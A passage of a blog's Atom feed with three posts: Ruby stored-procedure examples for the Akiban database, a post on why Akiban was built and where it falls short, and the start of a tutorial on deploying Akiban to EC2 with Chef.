    &lt;span class='k'&gt;def&lt;/span&gt; &lt;span class='nf'&gt;fib&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='n'&gt;n&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
      &lt;span class='n'&gt;n&lt;/span&gt; &lt;span class='o'&gt;&amp;lt;&lt;/span&gt; &lt;span class='mi'&gt;2&lt;/span&gt; &lt;span class='o'&gt;?&lt;/span&gt; &lt;span class='n'&gt;n&lt;/span&gt; &lt;span class='p'&gt;:&lt;/span&gt; &lt;span class='n'&gt;fib&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='n'&gt;n&lt;/span&gt; &lt;span class='o'&gt;-&lt;/span&gt; &lt;span class='mi'&gt;1&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='o'&gt;+&lt;/span&gt; &lt;span class='n'&gt;fib&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='n'&gt;n&lt;/span&gt; &lt;span class='o'&gt;-&lt;/span&gt; &lt;span class='mi'&gt;2&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='k'&gt;end&lt;/span&gt;
&lt;span class='vg'&gt;$$&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In the code above, note that &lt;code&gt;PARAMETER STYLE java&lt;/code&gt; means that the function named with &lt;code&gt;EXTERNAL NAME&lt;/code&gt; takes as many positional arguments as there are parameters. And an example of running it:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;test=&amp;gt; call fib_r(10);&lt;/span&gt;
&lt;span class='go'&gt;  s   &lt;/span&gt;
&lt;span class='go'&gt;------&lt;/span&gt;
&lt;span class='go'&gt; 55.0&lt;/span&gt;
&lt;span class='go'&gt;(1 row)&lt;/span&gt;

&lt;span class='go'&gt;test=&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A common technique used to speed up this implementation is to use memoization. A stored procedure that uses this technique follows:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='ruby'&gt;&lt;span class='no'&gt;CREATE&lt;/span&gt; &lt;span class='no'&gt;PROCEDURE&lt;/span&gt; &lt;span class='n'&gt;fib_non_r&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='no'&gt;IN&lt;/span&gt; &lt;span class='n'&gt;x&lt;/span&gt; &lt;span class='no'&gt;DOUBLE&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='no'&gt;OUT&lt;/span&gt; &lt;span class='n'&gt;s&lt;/span&gt; &lt;span class='no'&gt;DOUBLE&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
  &lt;span class='no'&gt;LANGUAGE&lt;/span&gt; &lt;span class='n'&gt;ruby&lt;/span&gt; &lt;span class='no'&gt;PARAMETER&lt;/span&gt; &lt;span class='no'&gt;STYLE&lt;/span&gt; &lt;span class='n'&gt;java&lt;/span&gt; &lt;span class='no'&gt;EXTERNAL&lt;/span&gt; &lt;span class='no'&gt;NAME&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;do_fib&amp;#39;&lt;/span&gt; &lt;span class='no'&gt;AS&lt;/span&gt; &lt;span class='vg'&gt;$$&lt;/span&gt;
    &lt;span class='k'&gt;def&lt;/span&gt; &lt;span class='nf'&gt;do_fib&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='n'&gt;x&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='n'&gt;s&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
      &lt;span class='n'&gt;s&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='mi'&gt;0&lt;/span&gt;&lt;span class='o'&gt;]&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='n'&gt;fib&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='n'&gt;x&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='k'&gt;end&lt;/span&gt;
    &lt;span class='vg'&gt;$fibonacci&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='no'&gt;Hash&lt;/span&gt;&lt;span class='o'&gt;.&lt;/span&gt;&lt;span class='n'&gt;new&lt;/span&gt;&lt;span class='p'&gt;{&lt;/span&gt; &lt;span class='o'&gt;|&lt;/span&gt;&lt;span class='n'&gt;h&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;&lt;span class='n'&gt;k&lt;/span&gt;&lt;span class='o'&gt;|&lt;/span&gt; &lt;span class='n'&gt;h&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='n'&gt;k&lt;/span&gt;&lt;span class='o'&gt;]&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='n'&gt;k&lt;/span&gt; &lt;span class='o'&gt;&amp;lt;&lt;/span&gt; &lt;span class='mi'&gt;2&lt;/span&gt; &lt;span class='o'&gt;?&lt;/span&gt; &lt;span class='n'&gt;k&lt;/span&gt; &lt;span class='p'&gt;:&lt;/span&gt; &lt;span class='n'&gt;h&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='n'&gt;k&lt;/span&gt;&lt;span class='o'&gt;-&lt;/span&gt;&lt;span class='mi'&gt;1&lt;/span&gt;&lt;span class='o'&gt;]&lt;/span&gt; &lt;span class='o'&gt;+&lt;/span&gt; &lt;span class='n'&gt;h&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='n'&gt;k&lt;/span&gt;&lt;span class='o'&gt;-&lt;/span&gt;&lt;span class='mi'&gt;2&lt;/span&gt;&lt;span class='o'&gt;]&lt;/span&gt; &lt;span class='p'&gt;}&lt;/span&gt;
    &lt;span class='k'&gt;def&lt;/span&gt; &lt;span class='nf'&gt;fib&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='n'&gt;n&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
      &lt;span class='vg'&gt;$fibonacci&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='n'&gt;n&lt;/span&gt;&lt;span class='o'&gt;]&lt;/span&gt;
    &lt;span class='k'&gt;end&lt;/span&gt;
&lt;span class='vg'&gt;$$&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Lets turn on some timing and compare the recursive version versus the version that uses memoization.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;test=&amp;gt; call fib_r(30);&lt;/span&gt;
&lt;span class='go'&gt;    s     &lt;/span&gt;
&lt;span class='go'&gt;----------&lt;/span&gt;
&lt;span class='go'&gt; 832040.0&lt;/span&gt;
&lt;span class='go'&gt;(1 row)&lt;/span&gt;

&lt;span class='go'&gt;Time: 469.492 ms&lt;/span&gt;
&lt;span class='go'&gt;test=&amp;gt;&lt;/span&gt;

&lt;span class='go'&gt;test=&amp;gt; call fib_non_r(30);&lt;/span&gt;
&lt;span class='go'&gt;    s     &lt;/span&gt;
&lt;span class='go'&gt;----------&lt;/span&gt;
&lt;span class='go'&gt; 832040.0&lt;/span&gt;
&lt;span class='go'&gt;(1 row)&lt;/span&gt;

&lt;span class='go'&gt;Time: 4.649 ms&lt;/span&gt;
&lt;span class='go'&gt;test=&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;As expected, the version that uses memoization is much better. Next I’m going to write a stored procedure that returns some data from a query. Let’s say I create a simple table and insert some data into it like so:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;test=&amp;gt; create table t1(id int);&lt;/span&gt;
&lt;span class='go'&gt;CREATE TABLE&lt;/span&gt;
&lt;span class='go'&gt;test=&amp;gt; insert into t1 values (1), (2), (3), (4), (5), (6);&lt;/span&gt;
&lt;span class='go'&gt;INSERT 0 6&lt;/span&gt;
&lt;span class='go'&gt;test=&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This stored procedure will return all the data from that table and order it by ID. A simple procedure to do that is:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='ruby'&gt;&lt;span class='no'&gt;CREATE&lt;/span&gt; &lt;span class='no'&gt;PROCEDURE&lt;/span&gt; &lt;span class='n'&gt;get_data&lt;/span&gt;&lt;span class='p'&gt;()&lt;/span&gt;
  &lt;span class='no'&gt;LANGUAGE&lt;/span&gt; &lt;span class='n'&gt;ruby&lt;/span&gt; &lt;span class='no'&gt;PARAMETER&lt;/span&gt; &lt;span class='no'&gt;STYLE&lt;/span&gt; &lt;span class='n'&gt;variables&lt;/span&gt; &lt;span class='no'&gt;AS&lt;/span&gt; &lt;span class='vg'&gt;$$&lt;/span&gt;
    &lt;span class='n'&gt;conn&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt;
&lt;span class='n'&gt;java&lt;/span&gt;&lt;span class='o'&gt;.&lt;/span&gt;&lt;span class='n'&gt;sql&lt;/span&gt;&lt;span class='o'&gt;.&lt;/span&gt;&lt;span class='n'&gt;DriverManager&lt;/span&gt;&lt;span class='o'&gt;.&lt;/span&gt;&lt;span class='n'&gt;get_connection&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;jdbc:default:connection&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='n'&gt;conn&lt;/span&gt;&lt;span class='o'&gt;.&lt;/span&gt;&lt;span class='n'&gt;create_statement&lt;/span&gt;&lt;span class='o'&gt;.&lt;/span&gt;&lt;span class='n'&gt;execute_query&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;SELECT id FROM t1 ORDER BY id&lt;/span&gt;
&lt;span class='s2'&gt;DESC&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
&lt;span class='vg'&gt;$$&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;And let’s call the stored procedure and see what kind of results we get:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;test=&amp;gt; call get_data();&lt;/span&gt;
&lt;span class='go'&gt; id &lt;/span&gt;
&lt;span class='go'&gt;----&lt;/span&gt;
&lt;span class='go'&gt;  6&lt;/span&gt;
&lt;span class='go'&gt;  5&lt;/span&gt;
&lt;span class='go'&gt;  4&lt;/span&gt;
&lt;span class='go'&gt;  3&lt;/span&gt;
&lt;span class='go'&gt;  2&lt;/span&gt;
&lt;span class='go'&gt;  1&lt;/span&gt;
&lt;span class='go'&gt;(6 rows)&lt;/span&gt;

&lt;span class='go'&gt;test=&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;As a last example, I want to extend this example and have an input parameter that filters the query results to only return ID values that are greater than whatever the input value is.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='ruby'&gt;&lt;span class='no'&gt;CREATE&lt;/span&gt; &lt;span class='no'&gt;PROCEDURE&lt;/span&gt; &lt;span class='n'&gt;get_data&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='no'&gt;IN&lt;/span&gt; &lt;span class='n'&gt;filter&lt;/span&gt; &lt;span class='no'&gt;BIGINT&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
  &lt;span class='no'&gt;LANGUAGE&lt;/span&gt; &lt;span class='n'&gt;ruby&lt;/span&gt; &lt;span class='no'&gt;PARAMETER&lt;/span&gt; &lt;span class='no'&gt;STYLE&lt;/span&gt; &lt;span class='n'&gt;variables&lt;/span&gt; &lt;span class='no'&gt;AS&lt;/span&gt; &lt;span class='vg'&gt;$$&lt;/span&gt;
    &lt;span class='n'&gt;conn&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt;
&lt;span class='n'&gt;java&lt;/span&gt;&lt;span class='o'&gt;.&lt;/span&gt;&lt;span class='n'&gt;sql&lt;/span&gt;&lt;span class='o'&gt;.&lt;/span&gt;&lt;span class='n'&gt;DriverManager&lt;/span&gt;&lt;span class='o'&gt;.&lt;/span&gt;&lt;span class='n'&gt;get_connection&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;jdbc:default:connection&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='n'&gt;conn&lt;/span&gt;&lt;span class='o'&gt;.&lt;/span&gt;&lt;span class='n'&gt;create_statement&lt;/span&gt;&lt;span class='o'&gt;.&lt;/span&gt;&lt;span class='n'&gt;execute_query&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;SELECT id FROM t1 WHERE id &amp;gt;&lt;/span&gt;
&lt;span class='si'&gt;#{&lt;/span&gt;&lt;span class='vg'&gt;$filter&lt;/span&gt;&lt;span class='si'&gt;}&lt;/span&gt;&lt;span class='s2'&gt; ORDER BY id DESC&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
&lt;span class='vg'&gt;$$&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Running the above procedure with a valid input value yields:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;test=&amp;gt; call get_data(2);&lt;/span&gt;
&lt;span class='go'&gt; id &lt;/span&gt;
&lt;span class='go'&gt;----&lt;/span&gt;
&lt;span class='go'&gt;  6&lt;/span&gt;
&lt;span class='go'&gt;  5&lt;/span&gt;
&lt;span class='go'&gt;  4&lt;/span&gt;
&lt;span class='go'&gt;  3&lt;/span&gt;
&lt;span class='go'&gt;(4 rows)&lt;/span&gt;

&lt;span class='go'&gt;test=&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The above were some simple examples of writing stored procedures in Ruby with Akiban. I’ll likely write another post with some more advanced examples when I get a chance. If this interested you, definitely download the &lt;a href='http://akiban.com/downloads'&gt;1.4.3 release&lt;/a&gt; and play around with it to try this out for yourself. If anybody has any questions or would like more examples and information, please ask in the comments or on our &lt;a href='https://groups.google.com/a/akiban.com/d/forum/akiban-user)'&gt;public mailing list&lt;/a&gt; and I’ll be happy to answer.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Why Build a New SQL Database?</title>
   <link href="http://posulliv.github.com/2012/11/12/why-akiban"/>
   <updated>2012-11-12T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2012/11/12/why-akiban</id>
   <content type="html">&lt;p&gt;When I’m at conferences or meetups and people discover I work for a company building a new database, there are usually a few puzzled looks. Explaining the technology behind Akiban to people is easy but the usual reason for the puzzlement is that many people wonder why on earth a company would want to develop a new database from scratch when so many alternatives already exist.&lt;/p&gt;

&lt;p&gt;There are good reasons, but I’ve struggled with articulating them especially when someone wants a 90 second explanation at a conference. In the interest of having an answer that I can easily refer people to, here’s what I think we’re trying to do. These are the problems that Akiban is aiming to solve.&lt;/p&gt;

&lt;h1 id='problems_akiban_solves'&gt;Problems Akiban Solves&lt;/h1&gt;

&lt;p&gt;&lt;em&gt;1) The object-relational impedance mismatch&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Frequently referred to as the “vietnam of computer science” by some people, this problem is defined by Wikipedia as:&lt;/p&gt;

&lt;p&gt;“a set of conceptual and technical difficulties that are often encountered when a relational database is being used by a program written in an OOO programming language or style”&lt;/p&gt;

&lt;p&gt;Typically, each class in an application is mapped to a table in the backend database with the fields of that class being columns of the table and each instance of that class is a row in the corresponding table. In Akiban, application objects map to what we call table groups. Table groups are fundamentally a way of storing data - we store data as interleaved rows in a B+ Tree. Or more simply put, Akiban stores data hierarchically.&lt;/p&gt;

&lt;p&gt;This makes integration of Akiban with existing ORM’s an interesting proposition since we expose methods of retrieving table groups directly through SQL. For example, Mike Bayer recently implemented support for Akiban in the SQLAlchemy &lt;a href='http://techspot.zzzeek.org/2012/10/25/supporting-a-very-interesting-new-database/'&gt;ORM for Python&lt;/a&gt;. We are also working on support for Doctrine in the PHP world and &lt;a href='http://github.com/akiban/activerecord-akiban-adapter'&gt;ActiveRecord&lt;/a&gt; in the Ruby world.&lt;/p&gt;

&lt;p&gt;Dr. Eric Brewer also touched on this in his &lt;a href='http://vimeo.com/52446728'&gt;closing talk&lt;/a&gt; at &lt;a href='http://basho.com/community/ricon2012/'&gt;RICON 2012&lt;/a&gt; (which seems to have been an excellent conference based on the posted videos). One quote from Dr. Brewer that really stuck out in my mind was - “instead of clean database where tables are joined at last minute. I actually want to have pre-joined them. I don&amp;#8217;t really want to do more than 1 query”. That ties in nicely with what we allow by exposing methods to retrieve table groups or part of a table group with nested SQL i.e. in 1 query, an entire table group or part of a table group can be retrieved.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;2) SQL (performance) doesn’t have to suck&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;SQL gets a bad rap. I’m not 100% sure if that’s because people don’t like the language or if it’s that people think that the performance of SQL queries are terrible due to poor experiences. Perhaps its a little bit of both. What’s great about SQL is that so-called ‘neck-tie’ programmers can easily use this declarative language to interact with a database system. To quote again from Dr. Brewer’s &lt;a href='http://basho.com/community/ricon2012/'&gt;RICON&lt;/a&gt; talk - “having a language for them is a good idea. nosql does not really talk to these people”.&lt;/p&gt;

&lt;p&gt;SQL can be used to solve many problem types. I once heard someone quip, “there’s a SQL query for that”, meaning it’s likely there are not many problems out there SQL cannot solve.&lt;/p&gt;

&lt;p&gt;SQL performance in Akiban is greatly improved due to table grouping and the fact that our entire system (in particular our query optimizer and execution engine) is built from the ground up with this storage architecture in mind. First off, queries that join tables within a single table group can execute without the need for a &lt;a href='http://www.akiban.com/blog/2011/08/24/join-for-free-explained/'&gt;join operation&lt;/a&gt;. This is due to how we store related data in table groups hierarchically. Second, &lt;a href='http://www.akiban.com/blog/2011/08/24/group-indexes-in-action'&gt;group_indexes&lt;/a&gt; can be created on top of a table group. This means that indexes can be created on columns from more than 1 table. Third, our optimizer can choose a number of different query execution plans that use multiple indexes such as index intersection and index merging thereby reducing the amount of data that needs to be processed during various stages of query execution.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;3) Do We Always Need ETL?&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Why is &lt;a href='http://en.wikipedia.org/wiki/Extract,_transform,_load'&gt;ETL&lt;/a&gt; brought up as a solution when someone talks about running complex reports? Obviously in some environments, an ETL process is absolutely needed. But wouldn’t we ideally like to perform queries typically performed in data warehouse environments in real-time without the requirement for a separate process to be performed? This process is typically needed because operational systems cannot handle the load that would be generated if complex reports were run against them . Running these types of queries against an operational system would likely cripple it (this is obviously a simplification of a complex process). We’ve had many customers come to us running reports against their operational database and they don’t feel like they should need to construct a data warehouse for the relatively simple reports they wish to run on their data. We tend to agree in some cases.&lt;/p&gt;

&lt;p&gt;Depending on who I am talking to, I either get someone really excited when I talk about this (marketing/sales people get all excited due to buzz words like ETL and real time) or am met with a groan and slight roll of the eyes (technical person who thinks I am full of shit). I can see why it comes across sounding like something a sales person would say without actually knowing what they are talking about. I do feel our message here needs to be worked on but with the release of projects like &lt;a href='https://github.com/cloudera/impala'&gt;Impala&lt;/a&gt; from Cloudera and &lt;a href='http://drawntoscale.com/why-spire/'&gt;Spire&lt;/a&gt; from Drawn to Scale, I feel its clear there is huge interest for a solution in this area. Akiban can help people fighting these types of problems.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;4) Augmenting Existing Deployments&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Our long-term goal is to become the main database for a customer and the database of choice when a developer starts a new project, but we understand its difficult for someone who has developed an entire application with an existing database like MySQL or PostgreSQL. What we have developed to deal with this reality is so called adapters for existing systems. Our first publically available adapter is for &lt;a href='http://launchpad.net/akiban-adapter-mysql'&gt;MySQL&lt;/a&gt; and this allows a user to spin up a regular MySQL slave and convert whatever tables they are interested in being part of a table group to Akiban.&lt;/p&gt;

&lt;h1 id='what_akiban_is_not_good_for_right_now'&gt;What Akiban is Not Good For (right now)&lt;/h1&gt;

&lt;p&gt;Now if you’ve read this far, you might be expecting me to list another problem that we solve as world hunger or something like that. We of course have some uses cases where we are not suitable and some drawbacks. So let’s balance the 4 problems I feel Akiban solves with 4 reasons why you might be reluctant to use Akiban at this present time.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;1) Scale out is coming, but not here yet.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Today Akiban is focused on single node performance but with an eye to developing scale out functionality in the near future. Our scale out capability is under development but it is not expected to be production ready until next year.&lt;/p&gt;

&lt;p&gt;This assumes you want to deploy Akiban as your main database. If you are deploying Akiban as a MySQL replica in an existing MySQL environment, there is no reason multiple MySQL slaves with Akiban cannot be spun up.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;2) Simple Queries or No Problems&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;If your application really only issues simple queries and does not use an ORM, then Akiban is not really a fit. I would be surprised if someone with such a workload would be experiencing problems.&lt;/p&gt;

&lt;p&gt;If your existing solution is working just fine for you, why change? You would be surprised at the number of customers we talk to who really have no need for our solution since they have no problems or are unlikely to have any need for Akiban in the near future. We are of course happy to work with these customers but we tell them straight up that they probably don’t need Akiban.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;3) Maturity&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Obviously many of the existing relational databases on the market today have a head start on us here (PostgreSQL by almost 30 years). If you are looking for a database solution that has been around for a long time and deployed countless times, Akiban may not be what you are looking for. I will add though that we have a few customers where we have been deployed for almost a year (public customer testimonials coming in the next few weeks all going well).&lt;/p&gt;

&lt;p&gt;However, I will say that this is another reason why we are working on adapters for other database systems. If you are not comfortable trying out a new database like Akiban, spinning it up as a slave in your staging/development environment for testing purposes is a pretty low risk and will not affect any existing infrastructure.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;4) Existing knowledge&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;This leads on from point (4) above. If you have built a large infrastructure on another database, its likely your staff is highly skilled in that database platform. While Akiban is quite easy to use and administer, as with other database systems, some knowledge of Akiban needs to be gained in order to use the system in the best manner possible. Also since Akiban is a new solution, not as much troubleshooting information is available publicly. For example, when encountering an issue in MySQL, a simple Google search is likely to result in being led to a page where someone else has documented a resolution for the issue.&lt;/p&gt;

&lt;h1 id='conclusion'&gt;Conclusion&lt;/h1&gt;

&lt;p&gt;This post was an honest attempt at stating what I personally think Akiban is a great solution for and what we are currently not a good fit for. My personal opinion (obviously biased since I work for Akiban) is that the problems we are solving far outweigh the drawbacks of our solution. We will have a scale out strategy in less than a year which is obviously important and you can be sure I will be blogging about that as we develop it. I’d also like to mention that points (3) and (4) that are dis-advantages of Akiban apply to any database solution that is relatively new and so is not unique to Akiban.&lt;/p&gt;

&lt;p&gt;Input on what we are doing at Akiban is very important to us. If you have any comments that you would like to add, please leave them here or ask on our public &lt;a href='https://groups.google.com/a/akiban.com/d/forum/akiban-user)'&gt;mailing list&lt;/a&gt;. Also, if you are curious to try the product out, it can be downloaded for free &lt;a href='http://akiban.com/downloads'&gt;here&lt;/a&gt;.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Deploying Akiban on EC2 with Chef</title>
   <link href="http://posulliv.github.com/2012/09/26/akiban-chef-ec2"/>
   <updated>2012-09-26T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2012/09/26/akiban-chef-ec2</id>
   <content type="html">&lt;p&gt;This post is a tutorial on how to deploy Akiban on an EC2 instance using chef and the &lt;a href='http://www.opscode.com/hosted-chef/'&gt;Opscode Chef&lt;/a&gt; platform.&lt;/p&gt;

&lt;h1 id='the_opscode_platform'&gt;The Opscode Platform&lt;/h1&gt;

&lt;p&gt;In this article, we&amp;#8217;ll use the Opscode platform since it provides an easy way for anyone to get started with chef. If you are a new user, proceed to &lt;a href='https://community.opscode.com/users/new'&gt;sign up&lt;/a&gt; for a new account. Once you are signed up, the next step is to create a new organization. For this article, I&amp;#8217;m going to create an organization named &lt;code&gt;akiban&lt;/code&gt;. Once your organization is created, you should see the organization in your list of organizations when you click on the &lt;code&gt;Organizations&lt;/code&gt; link at the top right of the opscode console. My view looks like:&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/akiban_opscode_console.png' alt='Opscode console.' /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;h1 id='configure_aws'&gt;Configure AWS&lt;/h1&gt;

&lt;p&gt;An assumption made in this article is that you have an &lt;span&gt;aws_link&lt;/span&gt; account. If you don&amp;#8217;t, signing up is relatively straightforward.&lt;/p&gt;

&lt;p&gt;Amazon blocks all incoming traffic to EC2 instances by default and SSH is used by chef to access and bootstrap a newly created instance. We want to allow SSH traffic to our EC2 instances and I don&amp;#8217;t want to use the default security group so for this article I created a new security group named &lt;code&gt;akiban&lt;/code&gt; with the appropriate rules (only SSH for now). After creating the new security group and adding the SSH rule, the group details for &lt;code&gt;akiban&lt;/code&gt; look like:&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/akiban_sec_group.png' alt='akiban security group.' /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;p&gt;I also created a new key pair specifically for this article. I gave this key pair the name &lt;code&gt;akiban&lt;/code&gt;. After creating this key pair, I downloaded the private key to my SSH folder and updated the permissions on the key:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;mv ~/Downloads/akiban.pem ~/.ssh/&lt;/span&gt;
&lt;span class='go'&gt;chmod go-r ~/.ssh/akiban.pem&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h1 id='configure_chef'&gt;Configure chef&lt;/h1&gt;

&lt;p&gt;This article assumes both chef and git are already installed on your workstation. In my case, I ran all these commands on OSX laptop. Instructions for installing chef can be found on &lt;a href='http://wiki.opscode.com/display/chef/Installation'&gt;Opscode&amp;#8217;s wiki&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;The first thing to do is create a chef repository on your workstation with &lt;code&gt;git&lt;/code&gt; and get a clean history:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;git clone git://github.com/opscode/chef-repo.git ~/akiban-chef-repo&lt;/span&gt;
&lt;span class='go'&gt;cd ~/akiban-chef-repo&lt;/span&gt;
&lt;span class='go'&gt;rm -rf .git&lt;/span&gt;
&lt;span class='go'&gt;git init .&lt;/span&gt;
&lt;span class='go'&gt;git add *&lt;/span&gt;
&lt;span class='go'&gt;git commit -a -m &amp;quot;Initial commit.&amp;quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The &lt;a href='http://wiki.opscode.com/display/chef/Chef+Repository'&gt;chef repository&lt;/a&gt; is a version controlled directory that contains cookbooks and other components relevant to chef.&lt;/p&gt;

&lt;p&gt;Next, create a &lt;code&gt;.chef&lt;/code&gt; directory withing this repository. This directory contains all the configuration files for just this chef repository:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;mkdir -p ~/akiban-chef-repo/.chef&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Next, we need to download keys and &lt;code&gt;knife&lt;/code&gt; configuration files from the Opscode platform that will be used for interacting with the Opscode platform. Keys are needed for both your user and organization on the Opscode platform. To retrieve your user key (if you did not download it when signing up), click on your username through the console and click &lt;code&gt;View profile&lt;/code&gt; on the right of that page. Finally, click the &lt;code&gt;get private key&lt;/code&gt; link on your account page as seen below:&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/akiban_chef_user.png' alt='User account profile.' /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;p&gt;After downloading this new key, I placed it in the configuration directory for the chef repository I am using for this article:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;mv ~/Downloads/posulliv.pen ~/akiban-chef-repo/.chef&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For your organization, click on the &lt;code&gt;Regenerate validation key&lt;/code&gt; link and &lt;code&gt;Generate knife config&lt;/code&gt; link from the organizations home page. After clicking those 2 links, you will have 2 files (dependent on your organization name obviously): 1) &lt;code&gt;akiban-validator.pem&lt;/code&gt; and 2) &lt;code&gt;knife.rb&lt;/code&gt;. These 2 files must be moved into the configuration directory for the chef repository being used for this article:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;mv ~/Downloads/akiban-validator.pem ~/akiban-chef-repo/.chef
mv ~/Downloads/kinfe.rb ~/akiban-chef-repo/chef
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
